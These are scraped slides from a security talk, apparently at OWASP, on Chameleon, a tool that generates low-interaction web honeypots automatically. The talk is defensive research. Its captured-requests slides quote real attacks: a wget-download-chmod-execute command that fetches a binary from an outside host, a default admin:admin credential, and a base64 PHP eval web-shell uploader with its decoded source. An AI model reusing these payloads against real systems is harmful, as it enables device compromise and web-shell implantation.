Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource...
Transcript of Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource...
![Page 1: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/1.jpg)
ChameleonAutomatic Generation of Low-Interaction Web Honeypots
Marius Musch (TU Braunschweig)Martin Härterich (SAP SE)
Image by Shobhan Tudu (Own work)[CC BY-SA 4.0], via Wikimedia Commons
![Page 2: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/2.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Agenda• Honeypots
• Types• Pros and Cons
• Generating Honeypots• Approach• Demo• Results
![Page 3: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/3.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Honeypots“A security resource whose value lies in being probed, attacked, or compromised” [1]
=> System you want to be attacked
![Page 4: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/4.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
High vs. Low Interaction• High-Interaction Honeypot (HIHP)
• What are attackers doing after they successfully compromised a system?
• Identify attackers from within the authenticated userbase
• Low-Interaction Honeypot (LIHP)• Are my systems under active attack?• Which vulnerabilities are targeted? • Profile outside attackers
Today: Focus on low-interaction server web honeypots
![Page 5: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/5.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Motivation for Using Honeypots“Prevent, Detect, React”
à Consider this in the context of the completesoftware development life-cycle
• Gather knowledge and statistics about frequency of attacks and primary attack vectors
• Study real attackers behavior when approaching honeypot systems• Use Knowledge collected in honeypot systems to
• improve your IDS• prioritize processing of code scan results• etc.
![Page 6: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/6.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Glastopf
For more examples watch [3]
![Page 7: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/7.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Pros and Cons• Advantages
• Collect valuable data• Allow examination of unknown attacks• Use minimal resources (only true for low-interaction)
• Disadvantages• Only limited vision• Manual development and configuration required• Detectable via fingerprinting
Can we automatically generate honeypots by observing real applications?
[4]
![Page 8: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/8.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Design Goals• Universality
• Independent of the original system’s underlying technology
• Automation • Create copy of target system without manual effort
• Scalability • Run many emulated systems instances on one machine
• Deception • Approximate indistinguishability from the real system
![Page 9: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/9.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
OverviewReal
Application
Parsing
- Static / dynamic- Learn semantics- Create templates
Publishing
- HTTP server - Select template- Log interactions
Honeypot
HTTP traffic Templates
Probing
- Crawl content- Fuzz inputs- Record traffic
![Page 10: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/10.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Probing• Goals
• Discover as many resources as possible• Identify range of responses
• Crawling• Recursively follow links, download everything multiple times
• Reconnaissance• Extract URLs from common files and find directory listings
• Fuzzing• Mutate existing data (Method, Query, Headers, Body)• Generate values for HTML forms
![Page 11: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/11.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Parsing• Goals
• Infer semantics of dynamic values• Build templates with placeholders
• Compare responses with diff algorithm
• Variables• Always changing: Random tokens, Counters• Input-dependent: Session tokens, Reflections • Rarely changing: Timestamps• Unknown
![Page 12: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/12.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Parsing example• Response 1 vs. 2 (Same cookies)
• It is now 19:23:445 UTC. To login click <a href= "http://xyz.com/login.php?ssid=wG45">here</a>
• Response 1 vs. 3 (Different cookies)• It is now 19:23:448 UTC. To login click <a href= "http://xyz.com/login.php?ssid=wG454SH8">here</a>
• Resulting template• It is now $_TIME_HH:mm:ss_$ UTC. To login click <a href= "http://$_HOST_$/login.php?ssid=$_SESSION-01_111000-0404-wGHS4458_$">here</a>
![Page 13: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/13.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Publishing• Goals
• Find best template for any given request• Generate response from template
![Page 14: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/14.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
DEMO
![Page 15: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/15.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Evaluation• Generate honeypots => Automation
• 5 popular CMSs
• Visual comparison => Compatibility• Take screenshot and compare pixels
• Fingerprinting => Deception• Worked with all tested tools: Nmap, WhatWeb, lbmap
![Page 16: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/16.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Empirical study
• Also replaced production WordPress with Chameleon
![Page 17: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/17.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Captured POST requests178.32.56.xxx/wordpress/wp-comments-post.php
akismet_comment_nonce=da2ee43abfauthor=Glass splashbackssubmit=Post Commentemail=mar***_****[email protected]_post_ID=665ak_js=991comment=Terrific work! This is the kind of information that shouyld bbeshared around the web.Disgrace on the seek egines for now not positiohing this post upper!
Come on over and visit my web site . Thannkyou =)url=http://www.glass-outlet.co.uk/products/splashbacks/comment_parent=0
![Page 18: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/18.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
More captured POST requests35.163.97.xxx/cgi-bin/supervisor/CloudSetup.cgi
connection=closeaccept=*/*content-length=0authorization=Basic YWRtaW46YWRtaW4=accept-encoding=gzip, deflate
exefile=wget -O /tmp/Arm1 http://172.247.116.xxx:85/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1
admin:admin
![Page 19: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/19.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
More captured POST requestsz0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApOyRucGF0aD0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLkJhU0U2NF9kRWNPZEUoJF9HRVRbJ3o0J10pO2Z1bmN0aW9uIGNyZWF0ZUZvbGRlcigkcGF0aCl7aWYoIWZpbGVfZXhpc3RzKCRwYXRoKSl7Y3JlYXRlRm9sZGVyKGRpcm5hbWUoJHBhdGgpKTtta2RpcigkcGF0aCwgMDc3Nyk7fX1jcmVhdGVGb2xkZXIoJG5wYXRoKTtlY2hvKCItPnwiKTs7JGM9JF9QT1NUWyJ6MiJdOyRmPSRucGF0aC5CYVNFNjRfZEVjT2RFKCRfR0VUWyJ6MyJdKTskYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTskYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTskYnVmPSIiO2ZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTIpJGJ1Zi49dXJsZGVjb2RlKCIlIi5zdWJzdHIoJGMsJGksMikpO2VjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpPyIxIjoiMCIpOztlY2hvKCJ8PC0iKTtkaWUoKTs=z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=z2=3C3F7068702020707265675F7265706C61636528222F6C6174657261696E2F65222C20226576222E22616C2827222E245F524551554553545B276675636B796F7534333231275D2E222729222C20226C6174657261696E2074657374696E3922293B203F3E393834333030login=cmdz3=c2ZuLnBocA==z9=BaSE64_dEcOdEcoco=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);$npath=$_SERVER['DOCUMENT_ROOT'].BaSE64_dEcOdE($_GET['z4']);functioncreateFolder($path){if(!file_exists($path)){createFolder(dirname($path));mkdir($path, 0777);}}createFolder($npath);echo("->|");;$c=$_POST["z2"];$f=$npath.BaSE64_dEcOdE($_GET["z3"]);$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
![Page 20: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/20.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Conclusion• Chameleon’s approach
• automates honeypot generation• is compatible with existing web servers• is highly scalable• allows to simulate large numbers of systems simultaneously• deceives automated tools
Questions?
![Page 21: Low-Interaction Web Honeypots - owasp.org · PDF filew-s Honeypots “A security resource whose value lies in being probed, attacked, or compromised” [1] => System you wantto be](https://reader033.fdocuments.net/reader033/viewer/2022051722/5a9eb5cf7f8b9a0d158bbb18/html5/thumbnails/21.jpg)
Auto
mat
ic G
ener
atio
n of
Low
-Inte
ract
ion
Web
Hon
eypo
ts
Resources• [1] Lance Spitzner: “Honeypots: Tracking Hackers”, Addison-Wesley, Boston,
2002.http://www.it-docs.net/ddata/792.pdf
• [2] Nawrocki, Marcin, et al. "A Survey on Honeypot Software and Data Analysis." arXiv preprint arXiv:1608.06249 (2016). https://arxiv.org/pdf/1608.06249.pdf
• [3] Dean Sysman, Gadi Evron, Itamar Sher: “Breaking Honeypots for Fun and Profit”, 32C3, 2015.https://media.ccc.de/v/32c3-7277-breaking_honeypots_for_fun_and_profit
• [4] Iyatiti Mokube, Michele Adams: “Honeypots: Concepts, Approaches, and Challenges”. ACMSE 2007, March 23-24, 2007, Winston-Salem, North Carolina, USA, pp.321-325. http://dl.acm.org/citation.cfm?id=1233399